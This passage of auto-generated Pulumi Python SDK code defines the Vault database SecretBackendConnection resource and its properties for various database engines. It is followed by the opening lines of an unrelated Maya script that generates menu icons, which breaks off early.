root_rotation_statements: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
snowflake: Optional[pulumi.Input['SecretBackendConnectionSnowflakeArgs']] = None,
verify_connection: Optional[pulumi.Input[bool]] = None):
"""
Input properties used for looking up and filtering SecretBackendConnection resources.
:param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_roles: A list of roles that are allowed to use this
connection.
:param pulumi.Input[str] backend: The unique name of the Vault mount to configure.
:param pulumi.Input['SecretBackendConnectionCassandraArgs'] cassandra: A nested block containing configuration options for Cassandra connections.
:param pulumi.Input[Mapping[str, Any]] data: A map of sensitive data to pass to the endpoint. Useful for templated connection strings.
:param pulumi.Input['SecretBackendConnectionElasticsearchArgs'] elasticsearch: A nested block containing configuration options for Elasticsearch connections.
:param pulumi.Input['SecretBackendConnectionHanaArgs'] hana: A nested block containing configuration options for SAP HanaDB connections.
:param pulumi.Input['SecretBackendConnectionMongodbArgs'] mongodb: A nested block containing configuration options for MongoDB connections.
:param pulumi.Input['SecretBackendConnectionMongodbatlasArgs'] mongodbatlas: A nested block containing configuration options for MongoDB Atlas connections.
:param pulumi.Input['SecretBackendConnectionMssqlArgs'] mssql: A nested block containing configuration options for MSSQL connections.
:param pulumi.Input['SecretBackendConnectionMysqlArgs'] mysql: A nested block containing configuration options for MySQL connections.
:param pulumi.Input['SecretBackendConnectionMysqlAuroraArgs'] mysql_aurora: A nested block containing configuration options for Aurora MySQL connections.
:param pulumi.Input['SecretBackendConnectionMysqlLegacyArgs'] mysql_legacy: A nested block containing configuration options for legacy MySQL connections.
:param pulumi.Input['SecretBackendConnectionMysqlRdsArgs'] mysql_rds: A nested block containing configuration options for RDS MySQL connections.
:param pulumi.Input[str] name: A unique name to give the database connection.
:param pulumi.Input['SecretBackendConnectionOracleArgs'] oracle: A nested block containing configuration options for Oracle connections.
:param pulumi.Input['SecretBackendConnectionPostgresqlArgs'] postgresql: A nested block containing configuration options for PostgreSQL connections.
:param pulumi.Input[Sequence[pulumi.Input[str]]] root_rotation_statements: A list of database statements to be executed to rotate the root user's credentials.
:param pulumi.Input['SecretBackendConnectionSnowflakeArgs'] snowflake: A nested block containing configuration options for Snowflake connections.
:param pulumi.Input[bool] verify_connection: Whether the connection should be verified on
initial configuration or not.
"""
if allowed_roles is not None:
pulumi.set(__self__, "allowed_roles", allowed_roles)
if backend is not None:
pulumi.set(__self__, "backend", backend)
if cassandra is not None:
pulumi.set(__self__, "cassandra", cassandra)
if data is not None:
pulumi.set(__self__, "data", data)
if elasticsearch is not None:
pulumi.set(__self__, "elasticsearch", elasticsearch)
if hana is not None:
pulumi.set(__self__, "hana", hana)
if mongodb is not None:
pulumi.set(__self__, "mongodb", mongodb)
if mongodbatlas is not None:
pulumi.set(__self__, "mongodbatlas", mongodbatlas)
if mssql is not None:
pulumi.set(__self__, "mssql", mssql)
if mysql is not None:
pulumi.set(__self__, "mysql", mysql)
if mysql_aurora is not None:
pulumi.set(__self__, "mysql_aurora", mysql_aurora)
if mysql_legacy is not None:
pulumi.set(__self__, "mysql_legacy", mysql_legacy)
if mysql_rds is not None:
pulumi.set(__self__, "mysql_rds", mysql_rds)
if name is not None:
pulumi.set(__self__, "name", name)
if oracle is not None:
pulumi.set(__self__, "oracle", oracle)
if postgresql is not None:
pulumi.set(__self__, "postgresql", postgresql)
if root_rotation_statements is not None:
pulumi.set(__self__, "root_rotation_statements", root_rotation_statements)
if snowflake is not None:
pulumi.set(__self__, "snowflake", snowflake)
if verify_connection is not None:
pulumi.set(__self__, "verify_connection", verify_connection)
@property
@pulumi.getter(name="allowedRoles")
def allowed_roles(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of roles that are allowed to use this
connection.
"""
return pulumi.get(self, "allowed_roles")
@allowed_roles.setter
def allowed_roles(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "allowed_roles", value)
@property
@pulumi.getter
def backend(self) -> Optional[pulumi.Input[str]]:
"""
The unique name of the Vault mount to configure.
"""
return pulumi.get(self, "backend")
@backend.setter
def backend(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "backend", value)
@property
@pulumi.getter
def cassandra(self) -> Optional[pulumi.Input['SecretBackendConnectionCassandraArgs']]:
"""
A nested block containing configuration options for Cassandra connections.
"""
return pulumi.get(self, "cassandra")
@cassandra.setter
def cassandra(self, value: Optional[pulumi.Input['SecretBackendConnectionCassandraArgs']]):
pulumi.set(self, "cassandra", value)
@property
@pulumi.getter
def data(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
A map of sensitive data to pass to the endpoint. Useful for templated connection strings.
"""
return pulumi.get(self, "data")
@data.setter
def data(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "data", value)
@property
@pulumi.getter
def elasticsearch(self) -> Optional[pulumi.Input['SecretBackendConnectionElasticsearchArgs']]:
"""
A nested block containing configuration options for Elasticsearch connections.
"""
return pulumi.get(self, "elasticsearch")
@elasticsearch.setter
def elasticsearch(self, value: Optional[pulumi.Input['SecretBackendConnectionElasticsearchArgs']]):
pulumi.set(self, "elasticsearch", value)
@property
@pulumi.getter
def hana(self) -> Optional[pulumi.Input['SecretBackendConnectionHanaArgs']]:
"""
A nested block containing configuration options for SAP HanaDB connections.
"""
return pulumi.get(self, "hana")
@hana.setter
def hana(self, value: Optional[pulumi.Input['SecretBackendConnectionHanaArgs']]):
pulumi.set(self, "hana", value)
@property
@pulumi.getter
def mongodb(self) -> Optional[pulumi.Input['SecretBackendConnectionMongodbArgs']]:
"""
A nested block containing configuration options for MongoDB connections.
"""
return pulumi.get(self, "mongodb")
@mongodb.setter
def mongodb(self, value: Optional[pulumi.Input['SecretBackendConnectionMongodbArgs']]):
pulumi.set(self, "mongodb", value)
@property
@pulumi.getter
def mongodbatlas(self) -> Optional[pulumi.Input['SecretBackendConnectionMongodbatlasArgs']]:
"""
A nested block containing configuration options for MongoDB Atlas connections.
"""
return pulumi.get(self, "mongodbatlas")
@mongodbatlas.setter
def mongodbatlas(self, value: Optional[pulumi.Input['SecretBackendConnectionMongodbatlasArgs']]):
pulumi.set(self, "mongodbatlas", value)
@property
@pulumi.getter
def mssql(self) -> Optional[pulumi.Input['SecretBackendConnectionMssqlArgs']]:
"""
A nested block containing configuration options for MSSQL connections.
"""
return pulumi.get(self, "mssql")
@mssql.setter
def mssql(self, value: Optional[pulumi.Input['SecretBackendConnectionMssqlArgs']]):
pulumi.set(self, "mssql", value)
@property
@pulumi.getter
def mysql(self) -> Optional[pulumi.Input['SecretBackendConnectionMysqlArgs']]:
"""
A nested block containing configuration options for MySQL connections.
"""
return pulumi.get(self, "mysql")
@mysql.setter
def mysql(self, value: Optional[pulumi.Input['SecretBackendConnectionMysqlArgs']]):
pulumi.set(self, "mysql", value)
@property
@pulumi.getter(name="mysqlAurora")
def mysql_aurora(self) -> Optional[pulumi.Input['SecretBackendConnectionMysqlAuroraArgs']]:
"""
A nested block containing configuration options for Aurora MySQL connections.
"""
return pulumi.get(self, "mysql_aurora")
@mysql_aurora.setter
def mysql_aurora(self, value: Optional[pulumi.Input['SecretBackendConnectionMysqlAuroraArgs']]):
pulumi.set(self, "mysql_aurora", value)
@property
@pulumi.getter(name="mysqlLegacy")
def mysql_legacy(self) -> Optional[pulumi.Input['SecretBackendConnectionMysqlLegacyArgs']]:
"""
A nested block containing configuration options for legacy MySQL connections.
"""
return pulumi.get(self, "mysql_legacy")
@mysql_legacy.setter
def mysql_legacy(self, value: Optional[pulumi.Input['SecretBackendConnectionMysqlLegacyArgs']]):
pulumi.set(self, "mysql_legacy", value)
@property
@pulumi.getter(name="mysqlRds")
def mysql_rds(self) -> Optional[pulumi.Input['SecretBackendConnectionMysqlRdsArgs']]:
"""
A nested block containing configuration options for RDS MySQL connections.
"""
return pulumi.get(self, "mysql_rds")
@mysql_rds.setter
def mysql_rds(self, value: Optional[pulumi.Input['SecretBackendConnectionMysqlRdsArgs']]):
pulumi.set(self, "mysql_rds", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
A unique name to give the database connection.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def oracle(self) -> Optional[pulumi.Input['SecretBackendConnectionOracleArgs']]:
"""
A nested block containing configuration options for Oracle connections.
"""
return pulumi.get(self, "oracle")
@oracle.setter
def oracle(self, value: Optional[pulumi.Input['SecretBackendConnectionOracleArgs']]):
pulumi.set(self, "oracle", value)
@property
@pulumi.getter
def postgresql(self) -> Optional[pulumi.Input['SecretBackendConnectionPostgresqlArgs']]:
"""
A nested block containing configuration options for PostgreSQL connections.
"""
return pulumi.get(self, "postgresql")
@postgresql.setter
def postgresql(self, value: Optional[pulumi.Input['SecretBackendConnectionPostgresqlArgs']]):
pulumi.set(self, "postgresql", value)
@property
@pulumi.getter(name="rootRotationStatements")
def root_rotation_statements(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of database statements to be executed to rotate the root user's credentials.
"""
return pulumi.get(self, "root_rotation_statements")
@root_rotation_statements.setter
def root_rotation_statements(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "root_rotation_statements", value)
@property
@pulumi.getter
def snowflake(self) -> Optional[pulumi.Input['SecretBackendConnectionSnowflakeArgs']]:
"""
A nested block containing configuration options for Snowflake connections.
"""
return pulumi.get(self, "snowflake")
@snowflake.setter
def snowflake(self, value: Optional[pulumi.Input['SecretBackendConnectionSnowflakeArgs']]):
pulumi.set(self, "snowflake", value)
@property
@pulumi.getter(name="verifyConnection")
def verify_connection(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the connection should be verified on
initial configuration or not.
"""
return pulumi.get(self, "verify_connection")
@verify_connection.setter
def verify_connection(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "verify_connection", value)
class SecretBackendConnection(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
allowed_roles: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
backend: Optional[pulumi.Input[str]] = None,
cassandra: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionCassandraArgs']]] = None,
data: Optional[pulumi.Input[Mapping[str, Any]]] = None,
elasticsearch: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionElasticsearchArgs']]] = None,
hana: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionHanaArgs']]] = None,
mongodb: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMongodbArgs']]] = None,
mongodbatlas: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMongodbatlasArgs']]] = None,
mssql: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMssqlArgs']]] = None,
mysql: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlArgs']]] = None,
mysql_aurora: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlAuroraArgs']]] = None,
mysql_legacy: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlLegacyArgs']]] = None,
mysql_rds: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlRdsArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
oracle: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionOracleArgs']]] = None,
postgresql: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionPostgresqlArgs']]] = None,
root_rotation_statements: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
snowflake: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionSnowflakeArgs']]] = None,
verify_connection: Optional[pulumi.Input[bool]] = None,
__props__=None):
"""
## Import
Database secret backend connections can be imported using the `backend`, `/config/`, and the `name`, e.g.
```sh
$ pulumi import vault:database/secretBackendConnection:SecretBackendConnection example postgres/config/postgres
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_roles: A list of roles that are allowed to use this
connection.
:param pulumi.Input[str] backend: The unique name of the Vault mount to configure.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionCassandraArgs']] cassandra: A nested block containing configuration options for Cassandra connections.
:param pulumi.Input[Mapping[str, Any]] data: A map of sensitive data to pass to the endpoint. Useful for templated connection strings.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionElasticsearchArgs']] elasticsearch: A nested block containing configuration options for Elasticsearch connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionHanaArgs']] hana: A nested block containing configuration options for SAP HanaDB connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionMongodbArgs']] mongodb: A nested block containing configuration options for MongoDB connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionMongodbatlasArgs']] mongodbatlas: A nested block containing configuration options for MongoDB Atlas connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionMssqlArgs']] mssql: A nested block containing configuration options for MSSQL connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlArgs']] mysql: A nested block containing configuration options for MySQL connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlAuroraArgs']] mysql_aurora: A nested block containing configuration options for Aurora MySQL connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlLegacyArgs']] mysql_legacy: A nested block containing configuration options for legacy MySQL connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlRdsArgs']] mysql_rds: A nested block containing configuration options for RDS MySQL connections.
:param pulumi.Input[str] name: A unique name to give the database connection.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionOracleArgs']] oracle: A nested block containing configuration options for Oracle connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionPostgresqlArgs']] postgresql: A nested block containing configuration options for PostgreSQL connections.
:param pulumi.Input[Sequence[pulumi.Input[str]]] root_rotation_statements: A list of database statements to be executed to rotate the root user's credentials.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionSnowflakeArgs']] snowflake: A nested block containing configuration options for Snowflake connections.
:param pulumi.Input[bool] verify_connection: Whether the connection should be verified on
initial configuration or not.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: SecretBackendConnectionArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
## Import
Database secret backend connections can be imported using the `backend`, `/config/`, and the `name`, e.g.
```sh
$ pulumi import vault:database/secretBackendConnection:SecretBackendConnection example postgres/config/postgres
```
:param str resource_name: The name of the resource.
:param SecretBackendConnectionArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(SecretBackendConnectionArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
allowed_roles: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
backend: Optional[pulumi.Input[str]] = None,
cassandra: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionCassandraArgs']]] = None,
data: Optional[pulumi.Input[Mapping[str, Any]]] = None,
elasticsearch: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionElasticsearchArgs']]] = None,
hana: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionHanaArgs']]] = None,
mongodb: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMongodbArgs']]] = None,
mongodbatlas: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMongodbatlasArgs']]] = None,
mssql: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMssqlArgs']]] = None,
mysql: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlArgs']]] = None,
mysql_aurora: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlAuroraArgs']]] = None,
mysql_legacy: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlLegacyArgs']]] = None,
mysql_rds: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlRdsArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
oracle: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionOracleArgs']]] = None,
postgresql: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionPostgresqlArgs']]] = None,
root_rotation_statements: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
snowflake: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionSnowflakeArgs']]] = None,
verify_connection: Optional[pulumi.Input[bool]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = SecretBackendConnectionArgs.__new__(SecretBackendConnectionArgs)
__props__.__dict__["allowed_roles"] = allowed_roles
if backend is None and not opts.urn:
raise TypeError("Missing required property 'backend'")
__props__.__dict__["backend"] = backend
__props__.__dict__["cassandra"] = cassandra
__props__.__dict__["data"] = data
__props__.__dict__["elasticsearch"] = elasticsearch
__props__.__dict__["hana"] = hana
__props__.__dict__["mongodb"] = mongodb
__props__.__dict__["mongodbatlas"] = mongodbatlas
__props__.__dict__["mssql"] = mssql
__props__.__dict__["mysql"] = mysql
__props__.__dict__["mysql_aurora"] = mysql_aurora
__props__.__dict__["mysql_legacy"] = mysql_legacy
__props__.__dict__["mysql_rds"] = mysql_rds
__props__.__dict__["name"] = name
__props__.__dict__["oracle"] = oracle
__props__.__dict__["postgresql"] = postgresql
__props__.__dict__["root_rotation_statements"] = root_rotation_statements
__props__.__dict__["snowflake"] = snowflake
__props__.__dict__["verify_connection"] = verify_connection
super(SecretBackendConnection, __self__).__init__(
'vault:database/secretBackendConnection:SecretBackendConnection',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
allowed_roles: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
backend: Optional[pulumi.Input[str]] = None,
cassandra: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionCassandraArgs']]] = None,
data: Optional[pulumi.Input[Mapping[str, Any]]] = None,
elasticsearch: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionElasticsearchArgs']]] = None,
hana: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionHanaArgs']]] = None,
mongodb: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMongodbArgs']]] = None,
mongodbatlas: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMongodbatlasArgs']]] = None,
mssql: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMssqlArgs']]] = None,
mysql: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlArgs']]] = None,
mysql_aurora: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlAuroraArgs']]] = None,
mysql_legacy: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlLegacyArgs']]] = None,
mysql_rds: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlRdsArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
oracle: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionOracleArgs']]] = None,
postgresql: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionPostgresqlArgs']]] = None,
root_rotation_statements: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
snowflake: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionSnowflakeArgs']]] = None,
verify_connection: Optional[pulumi.Input[bool]] = None) -> 'SecretBackendConnection':
"""
Get an existing SecretBackendConnection resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_roles: A list of roles that are allowed to use this
connection.
:param pulumi.Input[str] backend: The unique name of the Vault mount to configure.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionCassandraArgs']] cassandra: A nested block containing configuration options for Cassandra connections.
:param pulumi.Input[Mapping[str, Any]] data: A map of sensitive data to pass to the endpoint. Useful for templated connection strings.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionElasticsearchArgs']] elasticsearch: A nested block containing configuration options for Elasticsearch connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionHanaArgs']] hana: A nested block containing configuration options for SAP HanaDB connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionMongodbArgs']] mongodb: A nested block containing configuration options for MongoDB connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionMongodbatlasArgs']] mongodbatlas: A nested block containing configuration options for MongoDB Atlas connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionMssqlArgs']] mssql: A nested block containing configuration options for MSSQL connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlArgs']] mysql: A nested block containing configuration options for MySQL connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlAuroraArgs']] mysql_aurora: A nested block containing configuration options for Aurora MySQL connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlLegacyArgs']] mysql_legacy: A nested block containing configuration options for legacy MySQL connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionMysqlRdsArgs']] mysql_rds: A nested block containing configuration options for RDS MySQL connections.
:param pulumi.Input[str] name: A unique name to give the database connection.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionOracleArgs']] oracle: A nested block containing configuration options for Oracle connections.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionPostgresqlArgs']] postgresql: A nested block containing configuration options for PostgreSQL connections.
:param pulumi.Input[Sequence[pulumi.Input[str]]] root_rotation_statements: A list of database statements to be executed to rotate the root user's credentials.
:param pulumi.Input[pulumi.InputType['SecretBackendConnectionSnowflakeArgs']] snowflake: A nested block containing configuration options for Snowflake connections.
:param pulumi.Input[bool] verify_connection: Whether the connection should be verified on
initial configuration or not.
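A hedged lookup sketch; the ID follows the `<backend>/config/<name>` form used
for import, and the concrete values are illustrative:
```python
existing = SecretBackendConnection.get("existing",
    id="postgres/config/postgres")
```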
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _SecretBackendConnectionState.__new__(_SecretBackendConnectionState)
__props__.__dict__["allowed_roles"] = allowed_roles
__props__.__dict__["backend"] = backend
__props__.__dict__["cassandra"] = cassandra
__props__.__dict__["data"] = data
__props__.__dict__["elasticsearch"] = elasticsearch
__props__.__dict__["hana"] = hana
__props__.__dict__["mongodb"] = mongodb
__props__.__dict__["mongodbatlas"] = mongodbatlas
__props__.__dict__["mssql"] = mssql
__props__.__dict__["mysql"] = mysql
__props__.__dict__["mysql_aurora"] = mysql_aurora
__props__.__dict__["mysql_legacy"] = mysql_legacy
__props__.__dict__["mysql_rds"] = mysql_rds
__props__.__dict__["name"] = name
__props__.__dict__["oracle"] = oracle
__props__.__dict__["postgresql"] = postgresql
__props__.__dict__["root_rotation_statements"] = root_rotation_statements
__props__.__dict__["snowflake"] = snowflake
__props__.__dict__["verify_connection"] = verify_connection
return SecretBackendConnection(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="allowedRoles")
def allowed_roles(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of roles that are allowed to use this
connection.
"""
return pulumi.get(self, "allowed_roles")
@property
@pulumi.getter
def backend(self) -> pulumi.Output[str]:
"""
The unique name of the Vault mount to configure.
"""
return pulumi.get(self, "backend")
@property
@pulumi.getter
def cassandra(self) -> pulumi.Output[Optional['outputs.SecretBackendConnectionCassandra']]:
"""
A nested block containing configuration options for Cassandra connections.
"""
return pulumi.get(self, "cassandra")
@property
@pulumi.getter
def data(self) -> pulumi.Output[Optional[Mapping[str, Any]]]:
"""
A map of sensitive data to pass to the endpoint. Useful for templated connection strings.
"""
return pulumi.get(self, "data")
@property
@pulumi.getter
def elasticsearch(self) -> pulumi.Output[Optional['outputs.SecretBackendConnectionElasticsearch']]:
"""
A nested block containing configuration options for Elasticsearch connections.
"""
return pulumi.get(self, "elasticsearch")
@property
@pulumi.getter
def hana(self) -> pulumi.Output[Optional['outputs.SecretBackendConnectionHana']]:
"""
A nested block containing configuration options for SAP HanaDB connections.
"""
return pulumi.get(self, "hana")
@property
@pulumi.getter
def mongodb(self) -> pulumi.Output[Optional['outputs.SecretBackendConnectionMongodb']]:
"""
A nested block containing configuration options for MongoDB connections.
"""
return pulumi.get(self, "mongodb")
@property
@pulumi.getter
def mongodbatlas(self) -> pulumi.Output[Optional['outputs.SecretBackendConnectionMongodbatlas']]:
"""
A nested block containing configuration options for MongoDB Atlas connections.
"""
return pulumi.get(self, "mongodbatlas")
@property
@pulumi.getter
def mssql(self) -> pulumi.Output[Optional['outputs.SecretBackendConnectionMssql']]:
"""
A nested block containing configuration options for MSSQL connections.
"""
return pulumi.get(self, "mssql")
@property
@pulumi.getter
def mysql(self) -> pulumi.Output[Optional['outputs.SecretBackendConnectionMysql']]:
"""
A nested block containing configuration options for MySQL connections.
"""
return pulumi.get(self, "mysql")
@property
@pulumi.getter(name="mysqlAurora")
def mysql_aurora(self) -> pulumi.Output[Optional['outputs.SecretBackendConnectionMysqlAurora']]:
"""
A nested block containing configuration options for Aurora MySQL connections.
"""
return pulumi.get(self, "mysql_aurora")
@property
@pulumi.getter(name="mysqlLegacy")
def mysql_legacy(self) -> pulumi.Output[Optional['outputs.SecretBackendConnectionMysqlLegacy']]:
"""
A nested block containing configuration options for legacy MySQL connections.
"""
return pulumi.get(self, "mysql_legacy")
@property
@pulumi.getter(name="mysqlRds")
def mysql_rds(self) -> pulumi.Output[Optional['outputs.SecretBackendConnectionMysqlRds']]:
"""
A nested block containing configuration options for RDS MySQL connections.
"""
return pulumi.get(self, "mysql_rds")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
A unique name to give the database connection.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def oracle(self) -> pulumi.Output[Optional['outputs.SecretBackendConnectionOracle']]:
"""
A nested block containing configuration options for Oracle connections.
"""
return pulumi.get(self, "oracle")
@property
@pulumi.getter
def postgresql(self) -> pulumi.Output[Optional['outputs.SecretBackendConnectionPostgresql']]:
"""
A nested block containing configuration options for PostgreSQL connections.
"""
return pulumi.get(self, "postgresql")
@property
@pulumi.getter(name="rootRotationStatements")
def root_rotation_statements(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of database statements to be executed to rotate the root user's credentials.
"""
return pulumi.get(self, "root_rotation_statements")
@property
@pulumi.getter
def snowflake(self) -> pulumi.Output[Optional['outputs.SecretBackendConnectionSnowflake']]:
"""
A nested block containing configuration options for Snowflake connections.
"""
return pulumi.get(self, "snowflake")
@property
@pulumi.getter(name="verifyConnection")
def verify_connection(self) -> pulumi.Output[Optional[bool]]:
"""
Whether the connection should be verified on
initial configuration or not.
"""
return pulumi.get(self, "verify_connection")
# ---- python-scripts/gt_generate_icons.py (freemanpro/gt-tools, MIT) ----
"""
GT Generate Icons - Generates icons used by GT Tools menu
@Guilherme Trevisan - TrevisanGMW@gmail.com - 2020-11-03 - github.com/TrevisanGMW
1.0 - 2020-11-03
Initial Release
Creates Maya to Discord Icon
1.1 - 2020-12-11
Creates fSpy Importer Icon
"""
import maya.cmds as cmds
import base64
import os
def gt_generate_icons():
icons_folder_dir = cmds.internalVar(userBitmapsDir=True)
# GT Maya to Discord Icon
gt_mtod_icon_image = icons_folder_dir + 'gt_maya_to_discord_icon.png'
gt_fspy_icon_image = icons_folder_dir + 'gt_fspy_importer.png'
if os.path.isdir(icons_folder_dir):
# Maya to Discord
